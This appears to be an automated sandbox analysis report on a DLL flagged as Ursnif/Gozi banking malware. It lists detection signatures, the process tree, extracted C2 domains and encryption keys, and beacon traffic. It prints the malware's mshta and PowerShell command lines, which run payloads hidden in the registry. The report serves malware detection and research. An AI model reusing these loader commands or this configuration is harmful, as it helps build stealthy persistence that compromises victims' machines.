Loading ...

Play interactive tourEdit tour

Windows Analysis Report lj3H69Z3Io.dll

Overview

General Information

Sample Name:lj3H69Z3Io.dll
Analysis ID:447090
MD5:0bb29556ece1c51c751cb4e7c8752ddc
SHA1:324cc356a56c68e51f09348e91405001e68e4a08
SHA256:af1b052362469a67fcd871558b24efa2be44a4b29f88112e5c2d2295a1dc4252
Tags:dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Yara detected Ursnif
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3296 cmdline: loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 2696 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1304 cmdline: rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3416 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1808 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5964 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5796 cmdline: rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 996 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2592 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6132 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.4f594a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Encoded IEXShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
              Sigma detected: MSHTA Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
              Sigma detected: Mshta Spawning Windows ShellShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6132, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5004

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000003.00000003.351054723.00000000027A0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "RS1bISYM3RiUEB+kp8sXk6GKaUSJTMdHLJSpyFRYeZm6NlcBwtjx2F3paluhib1HCWprL2CGUSXu41FZM2nRjuIHp5Tc3Qvf1bHq8axt1kKB98ZnmfPh2SiQVpHGVA+TOuAe97sVP0cE6xXX2ilAxOJC4Rf34gUi3XolV8kPrfJCHChbu9w1+s7rrVZTOVjBW+TY1D3deVJlDZHvhlBuumQis3pP1XsoLa3Qay006/AhbN9RIoAAij7c7SagXOd4BXA8L9GZCI5rXohvITy2kTk5pHs5LCiTFpT9Pohv1JBotMkOGx7WyBP+G1Cbx4yBjRbbIosmagFN4Hgw4QhKyFdWlAfAWJCgEYrSkeFoNBM=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "B43ovnLWYCtQUCWU", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: gtr.antoinfer.comVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for submitted fileShow sources
              Source: lj3H69Z3Io.dllVirustotal: Detection: 41%Perma Link
              Source: lj3H69Z3Io.dllReversingLabs: Detection: 31%
              Source: lj3H69Z3Io.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: lj3H69Z3Io.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
              Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
              Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E188626 FindFirstFileExA,2_2_6E188626
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: global trafficHTTP traffic detected: GET /4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/xP63sFYeQbF7V/py7Hi7cb/9YfAdWQtdGthxteTogc4W5n/e4pHdJmwQV/Xb_2ByBc4q7LehmCP/qbPYu2dVkV6R/HcylsChDiT2/MxSzZGJm_2F7kQ/SwyqdbxYkDgH_2FqkftiZ/sgfsFtj_2BtQQ2R6/R1qw5igRxvImwz6/pMeyM_2FrLNrloESyl/5_2BeunOI/9zlfRQun7lnhbsKL_2FH/F_2B8nMOma_2F2fjvu5/bI8nw1gkOTg_2F0CTqoQIr/cSQsg2LKmpe1I/kDimvPNH/SgPLk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/uvvfHn2PMXNEy/YMBxD3SD/aXgaxQm1VvX_2F13h2xPwK_/2Be7i5l50E/A7ENFq4ZupT65ephY/chqySvAke9ce/Kevf8ZZImEj/1Va42IfLQ3XJd9/R1lLLjkYwIWCsGvDlqysG/bJCIxC_2Ba_2FKBG/1sCib9KWGT9006o/pVIAR6x7f8e8pX6JMX/r5dwKRidW/K11bWM2mJHwpxkeOpFZf/WuqCfL3c8woO2jHlv7x/oi4kjIDfCy176FSPyJZhM9/EN_2FkQv43sxx/a HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd/bp1e8aV2PI_2/FY5oP4oo0f6/GeARX2_2FlA_2F/2BhurwBe_2BrsQ1B1bUK7/wilinEmmYIdaZ6lz/71Mw33QzoCtr9s9/ULFilVIFcIxUDJIsEo/crrSiFkaK/6sQSCYti3ETwug18IBlk/b94MQVqQ698rgMibrOo/RMBVkg8AFrK4uT2Dq6pO06/OdceZPFn8QQWz/SARUSfJd/dirYBJB3Uuu4IivFAYs9FmV/Pmcsy6YvBv/Lcgiqf1bUTKnYCeNL/dikDMv66Bty/6H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Jul 2021 09:50:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.drString found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x
              Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2
              Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.drString found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd
              Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.drString found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u
              Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
